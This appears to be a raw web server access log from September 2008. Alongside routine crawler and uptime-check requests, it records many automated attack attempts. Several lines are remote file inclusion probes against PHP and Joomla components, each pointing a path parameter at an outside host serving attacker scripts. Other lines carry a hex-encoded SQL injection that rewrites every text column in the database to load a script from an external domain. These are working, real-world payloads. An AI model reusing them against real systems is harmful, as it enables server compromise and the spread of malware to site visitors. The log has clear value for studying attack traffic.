74.6.17.183 - - [06/Sep/2008:00:52:17 -0400] "GET /logs/access_log.Q107070500 HTTP/1.0" 200 2848706 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
65.9.172.212 - - [06/Sep/2008:00:46:37 -0400] "GET /logs/access_log.Q108060700?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 491534 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
193.189.74.23 - - [06/Sep/2008:00:53:41 -0400] "GET /logs/access_log.Q108082400//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 269 "-" "libwww-perl/5.811"
193.189.74.23 - - [06/Sep/2008:00:53:41 -0400] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 242 "-" "libwww-perl/5.811"
193.189.74.23 - - [06/Sep/2008:00:53:41 -0400] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 247 "-" "libwww-perl/5.811"
141.89.66.2 - - [06/Sep/2008:00:53:43 -0400] "GET /home.php?x=http://www.tabernus.com/downloads/response.txt???? HTTP/1.1" 404 206 "-" "libwww-perl/5.805"
141.89.66.2 - - [06/Sep/2008:00:53:43 -0400] "GET /logs/home.php?x=http://www.tabernus.com/downloads/response.txt???? HTTP/1.1" 404 211 "-" "libwww-perl/5.805"
141.89.66.2 - - [06/Sep/2008:00:53:43 -0400] "GET /logs/access_log.Q108040800/home.php?x=http://www.tabernus.com/downloads/response.txt???? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
141.89.66.2 - - [06/Sep/2008:00:53:44 -0400] "GET /logs/access_log.Q108080300/home.php?x=http://www.tabernus.com/downloads/response.txt???? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
193.189.74.23 - - [06/Sep/2008:00:53:44 -0400] "GET /logs/access_log.Q108082400//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 269 "-" "libwww-perl/5.811"
193.189.74.23 - - [06/Sep/2008:00:53:44 -0400] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 242 "-" "libwww-perl/5.811"
193.189.74.23 - - [06/Sep/2008:00:53:44 -0400] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 247 "-" "libwww-perl/5.811"
141.89.66.2 - - [06/Sep/2008:00:53:59 -0400] "GET /logs/error_log.Q108070800/index1.php?x=http://www.tabernus.com/downloads/response.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
141.89.66.2 - - [06/Sep/2008:00:53:59 -0400] "GET /logs/index1.php?x=http://www.tabernus.com/downloads/response.txt???? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
141.89.66.2 - - [06/Sep/2008:00:53:59 -0400] "GET /index1.php?x=http://www.tabernus.com/downloads/response.txt???? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
141.89.66.2 - - [06/Sep/2008:00:54:00 -0400] "GET /logs/error_log.Q108040100/index1.php?x=http://www.tabernus.com/downloads/response.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
141.89.66.2 - - [06/Sep/2008:00:54:08 -0400] "GET /logs/access_log.Q108070800/index1.php?x=http://www.tabernus.com/downloads/response.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
141.89.66.2 - - [06/Sep/2008:00:54:08 -0400] "GET /logs/access_log.Q108061300/index1.php?x=http://www.tabernus.com/downloads/response.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
141.89.66.2 - - [06/Sep/2008:00:54:24 -0400] "GET /logs/access_log.Q108052800/index2.php?x=http://www.tabernus.com/downloads/response.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
141.89.66.2 - - [06/Sep/2008:00:54:24 -0400] "GET /index2.php?x=http://www.tabernus.com/downloads/response.txt???? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
141.89.66.2 - - [06/Sep/2008:00:54:24 -0400] "GET /logs/index2.php?x=http://www.tabernus.com/downloads/response.txt???? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
141.89.66.2 - - [06/Sep/2008:00:54:27 -0400] "GET /logs/access_log.Q108070400/index2.php?x=http://www.tabernus.com/downloads/response.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
74.6.17.183 - - [06/Sep/2008:00:54:20 -0400] "GET /logs/access_log.Q107063000 HTTP/1.0" 200 1170276 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
80.93.62.97 - - [06/Sep/2008:00:55:31 -0400] "GET /logs/access_log.Q108082000//newspublish/include.php?path%5Bdocroot%5D=http://br.geocities.com/kaizoku_56/sak4w/id2.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
80.93.62.97 - - [06/Sep/2008:00:55:31 -0400] "GET /logs/access_log.Q108082000//newspublish/include.php?path%5Bdocroot%5D=http://br.geocities.com/kaizoku_56/sak4w/id2.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
80.93.62.97 - - [06/Sep/2008:00:55:31 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://br.geocities.com/kaizoku_56/sak4w/id2.txt??? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
80.93.62.97 - - [06/Sep/2008:00:55:31 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://br.geocities.com/kaizoku_56/sak4w/id2.txt??? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
80.93.62.97 - - [06/Sep/2008:00:55:31 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://br.geocities.com/kaizoku_56/sak4w/id2.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
80.93.62.97 - - [06/Sep/2008:00:55:31 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://br.geocities.com/kaizoku_56/sak4w/id2.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
80.93.62.97 - - [06/Sep/2008:00:55:45 -0400] "GET /logs/error_log.Q108082000//newspublish/include.php?path%5Bdocroot%5D=http://br.geocities.com/kaizoku_56/sak4w/id2.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
80.93.62.97 - - [06/Sep/2008:00:55:46 -0400] "GET /logs/error_log.Q108082000//newspublish/include.php?path%5Bdocroot%5D=http://br.geocities.com/kaizoku_56/sak4w/id2.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
209.59.12.99 - - [06/Sep/2008:00:56:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.199.244.42 - - [06/Sep/2008:00:57:45 -0400] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.geocities.com/fahmyakbar.com/header.jpg? HTTP/1.1" 404 238 "-" "libwww-perl/5.811"
209.59.12.99 - - [06/Sep/2008:01:01:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.150.189.10 - - [06/Sep/2008:01:01:57 -0400] "GET /logs/error_log.Q108081800/index.php?uri=http://www.governador.xpg.com.br/idd.txt?%0D?? HTTP/1.1" 404 233 "-" "libwww-perl/5.76"
200.150.189.10 - - [06/Sep/2008:01:01:57 -0400] "GET /logs/index.php?uri=http://www.governador.xpg.com.br/idd.txt?%0D?? HTTP/1.1" 404 212 "-" "libwww-perl/5.76"
81.169.162.47 - - [06/Sep/2008:01:02:33 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.haircs.com/bbs/skin/zero_read/test.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
81.169.162.47 - - [06/Sep/2008:01:02:33 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.haircs.com/bbs/skin/zero_read/test.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
200.150.189.10 - - [06/Sep/2008:01:03:21 -0400] "GET /logs/error_log.Q108070500/index.php?uri=http://www.governador.xpg.com.br/idd.txt?%0D?? HTTP/1.1" 404 233 "-" "libwww-perl/5.76"
80.93.62.97 - - [06/Sep/2008:01:05:12 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://br.geocities.com/kaizoku_56/sak4w/id2.txt??? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
80.93.62.97 - - [06/Sep/2008:01:05:14 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://br.geocities.com/kaizoku_56/sak4w/id2.txt??? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
74.6.17.183 - - [06/Sep/2008:01:04:47 -0400] "GET /logs/access_log.Q107060800 HTTP/1.0" 200 2972073 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [06/Sep/2008:01:06:27 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.221.210.103 - - [06/Sep/2008:01:07:39 -0400] "GET /logs/error_log.Q108071700//cyberfolio/portfolio/msg/view.php?av=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
66.221.210.103 - - [06/Sep/2008:01:07:39 -0400] "GET //cyberfolio/portfolio/msg/view.php?av=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
66.221.210.103 - - [06/Sep/2008:01:07:39 -0400] "GET /logs//cyberfolio/portfolio/msg/view.php?av=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
69.73.188.36 - - [06/Sep/2008:01:08:11 -0400] "GET /logs/access_log.Q108081700//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 269 "-" "libwww-perl/5.810"
69.73.188.36 - - [06/Sep/2008:01:08:11 -0400] "GET /logs/access_log.Q108081700//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 269 "-" "libwww-perl/5.810"
66.221.210.103 - - [06/Sep/2008:01:08:38 -0400] "GET /logs/error_log.Q108070500//cyberfolio/portfolio/msg/view.php?av=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
121.254.169.86 - - [06/Sep/2008:01:09:01 -0400] "GET /logs/access_log.Q108082700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ellinotopos.com/idar.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
121.254.169.86 - - [06/Sep/2008:01:09:02 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ellinotopos.com/idar.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
121.254.169.86 - - [06/Sep/2008:01:09:03 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ellinotopos.com/idar.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
121.254.169.86 - - [06/Sep/2008:01:09:05 -0400] "GET /logs/access_log.Q108082700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ellinotopos.com/idxx.txt????? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
121.254.169.86 - - [06/Sep/2008:01:09:05 -0400] "GET /logs/access_log.Q108082700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ellinotopos.com/idar.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
121.254.169.86 - - [06/Sep/2008:01:09:05 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ellinotopos.com/idxx.txt????? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
121.254.169.86 - - [06/Sep/2008:01:09:05 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ellinotopos.com/idar.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
121.254.169.86 - - [06/Sep/2008:01:09:06 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ellinotopos.com/idxx.txt????? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
121.254.169.86 - - [06/Sep/2008:01:09:06 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ellinotopos.com/idar.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
121.254.169.86 - - [06/Sep/2008:01:09:09 -0400] "GET /logs/access_log.Q108082700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ellinotopos.com/idxx.txt????? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
121.254.169.86 - - [06/Sep/2008:01:09:10 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ellinotopos.com/idxx.txt????? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
121.254.169.86 - - [06/Sep/2008:01:09:11 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ellinotopos.com/idxx.txt????? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
74.6.17.183 - - [06/Sep/2008:01:09:26 -0400] "GET /logs/access_log.Q107090200 HTTP/1.0" 200 650455 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
64.246.42.3 - - [06/Sep/2008:01:11:11 -0400] "GET /logs/access_log.Q108082400/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 263 "-" "libwww-perl/5.64"
64.246.42.3 - - [06/Sep/2008:01:11:13 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.64"
64.246.42.3 - - [06/Sep/2008:01:11:14 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 241 "-" "libwww-perl/5.64"
64.246.42.3 - - [06/Sep/2008:01:11:16 -0400] "GET /logs/access_log.Q108071700/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 263 "-" "libwww-perl/5.64"
209.59.12.99 - - [06/Sep/2008:01:11:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.254.169.86 - - [06/Sep/2008:01:11:40 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
121.254.169.86 - - [06/Sep/2008:01:11:40 -0400] "GET /logs/access_log.Q108082700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
121.254.169.86 - - [06/Sep/2008:01:11:40 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
193.189.74.23 - - [06/Sep/2008:01:11:55 -0400] "GET /logs/access_log.Q108081700//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 269 "-" "libwww-perl/5.811"
193.189.74.23 - - [06/Sep/2008:01:12:01 -0400] "GET /logs/access_log.Q108081700//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 269 "-" "libwww-perl/5.811"
201.6.251.5 - - [06/Sep/2008:01:12:31 -0400] "GET /logs/access_log.Q108082700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 277 "-" "libwww-perl/5.805"
201.6.251.5 - - [06/Sep/2008:01:12:32 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
201.6.251.5 - - [06/Sep/2008:01:12:32 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
121.254.169.86 - - [06/Sep/2008:01:15:46 -0400] "GET /logs/access_log.Q108082600//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
209.59.12.99 - - [06/Sep/2008:01:16:27 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.254.169.86 - - [06/Sep/2008:01:17:17 -0400] "GET /logs/access_log.Q108082600//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ellinotopos.com/idxx.txt????? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
121.254.169.86 - - [06/Sep/2008:01:17:28 -0400] "GET /logs/access_log.Q108082600//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ellinotopos.com/idxx.txt????? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
121.254.169.86 - - [06/Sep/2008:01:17:41 -0400] "GET /logs/access_log.Q108082600//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ellinotopos.com/idar.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
121.254.169.86 - - [06/Sep/2008:01:17:51 -0400] "GET /logs/access_log.Q108082600//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ellinotopos.com/idar.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
66.199.244.42 - - [06/Sep/2008:01:18:58 -0400] "GET /scanhttp://www.geocities.com/fahmyakbar.com/header.jpg? HTTP/1.1" 404 252 "-" "libwww-perl/5.811"
121.101.159.29 - - [06/Sep/2008:01:20:04 -0400] "GET //?_zb_path=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
121.101.159.29 - - [06/Sep/2008:01:20:04 -0400] "GET /logs/error_log.Q108051300//?_zb_path=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
121.101.159.29 - - [06/Sep/2008:01:20:04 -0400] "GET /logs//?_zb_path=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 200 64537 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
81.169.162.47 - - [06/Sep/2008:01:20:52 -0400] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.haircs.com/bbs/skin/zero_read/test.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
81.169.162.47 - - [06/Sep/2008:01:20:52 -0400] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.haircs.com/bbs/skin/zero_read/test.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
72.249.64.170 - - [06/Sep/2008:01:21:28 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.muhtaroglu.com.tr/bo.do??? HTTP/1.1" 404 243 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
72.249.64.170 - - [06/Sep/2008:01:21:28 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.muhtaroglu.com.tr/bo.do??? HTTP/1.1" 404 238 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
72.249.64.170 - - [06/Sep/2008:01:21:33 -0400] "GET //?sIncPath=http://www.muhtaroglu.com.tr/bo.do??? HTTP/1.1" 200 452 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
72.249.64.170 - - [06/Sep/2008:01:21:33 -0400] "GET /logs//?sIncPath=http://www.muhtaroglu.com.tr/bo.do??? HTTP/1.1" 200 64537 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
209.59.12.99 - - [06/Sep/2008:01:21:37 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
201.6.251.5 - - [06/Sep/2008:01:22:10 -0400] "GET /logs/access_log.Q108081700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 277 "-" "libwww-perl/5.805"
72.249.64.170 - - [06/Sep/2008:01:24:49 -0400] "GET /errors.php?error=http://www.muhtaroglu.com.tr/bo.do??? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
72.249.64.170 - - [06/Sep/2008:01:24:49 -0400] "GET /logs/errors.php?error=http://www.muhtaroglu.com.tr/bo.do??? HTTP/1.1" 404 213 "-" "Advanced Browser (http://www.avantbrowser.com)"
65.9.172.212 - - [06/Sep/2008:00:46:37 -0400] "GET /logs/access_log.Q108060300?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 4709054 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
65.9.172.212 - - [06/Sep/2008:00:46:37 -0400] "GET /logs/access_log.Q108060300?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 4709054 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
209.59.12.99 - - [06/Sep/2008:01:26:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
